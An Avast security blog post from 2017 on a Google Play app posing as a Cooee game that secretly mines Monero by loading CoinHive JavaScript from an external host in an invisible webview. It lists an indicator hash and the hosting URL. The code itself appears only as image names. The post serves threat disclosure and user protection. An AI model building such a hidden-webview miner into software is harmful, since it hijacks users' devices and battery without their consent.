Mobile Security

Cryptocurrency mining malware sneaks onto Google Play

Nikolaos Chrysaidos, 3 November 2017

Avast finds and detects an app that mines the Monero cryptocurrency

Cryptocurrency mining is a hot and trending topic at the moment, especially since websites have recently resorted to mining cryptocurrency instead of showing ads. As with many malicious trends, the cybercriminals have quickly moved from PC to mobile. This week, we found an app that contains cryptocurrency mining capabilities on the Google Play Store, masquerading as the Cooee game. Between 1,000 and 5,000 users downloaded the app. We detect the malware as JSMiner and we informed Google of the app yesterday.

XCooeep Google Play app.png

XCooeep_Google_Play_app_details.png

Cryptocurrency mining

It’s important to understand that mining cryptocurrency is actually a legit business. Scaling enough to maximize profit requires strong computing power, though, which is why some miners run huge server farms to mine Bitcoin or other cryptocurrencies, such as Litecoin, Ethereum, or Monero. Constructing and maintaining the infrastructure and accessing the electricity necessary to run them requires enormous financial investment.

Since mining cryptocurrencies is expensive, miners are resorting to abusing the processing power of other devices and are spreading mining programs through apps and websites. We consider cryptocurrency mining malicious when it is done without the user’s permission, which is what happened in this case.

Let the mining begin… or not

In order for the malware to start the process of mining, all the user needs to do after downloading the app, is click the button below. The button’s actual main purpose should be to allow the user to log into the Cooee Club 3D Chat Community panel.

XCOOEEP_Button.png

After clicking the button above, a new webview is opened in the background. This allows the malware to load CoinHive Javascript code from an external host address. The mining then begins.

Once the mining process begins, the phone will heat up, as CPU utilization is very high.

The malware mines the cryptocurrency Monero. The end goal for the cybercriminals is financial gain, but what the cybercriminals don’t seem to realize is that mining on a mobile device cannot deliver much profit. Mobile devices don’t have the processing power that PCs have to really successfully mine and on top of that, mobile devices often have limited battery life, because they are not constantly being charged, thus limiting the mining time.

In the code below, we can see that the malware opens two webviews: One with the login panel (Clubcooee) and a second invisible webview with the site that hosts the Coinhive JS code.

CoinHive_Webview.png

The new webview is hidden (android:visibility="invisible"), so that the user cannot suspect anything, perhaps apart from his or her phone increasing in temperature.

CoinHive_Webview_invisible.png

Below is the CoinHive JS code that is used for the mining:

CoinHive_JS.png

How to protect yourself

The interesting thing is how easy it is to integrate CoinHive code into a mobile app and start mining. This new trend of mining mobile malware will continue to grow given the ease of implementation, and perhaps spread more widely given that around hundreds of thousands of devices are needed in order to successfully mine cryptocurrencies via smartphone.

To protect your phone from becoming a miner, make sure you install Avast Mobile Security, if you haven’t done so already. Furthermore, keep an eye on the apps you have installed and the amount of CPU they use. If you notice your phone is heating up extremely quickly, especially when it’s not in use, check to see which apps are consuming more processing power than they should and then consider getting rid of the app.

IOC

SHA256Host78CBF53BBEC98D641241F7A4D34655684FAE1CD85A3782A1E49C1C7BCBC7F5D2http://pagebin.com/eGHvp4jC

 The below video shows CPU usage before the app is downloaded, after it is downloaded and after the login page is opened.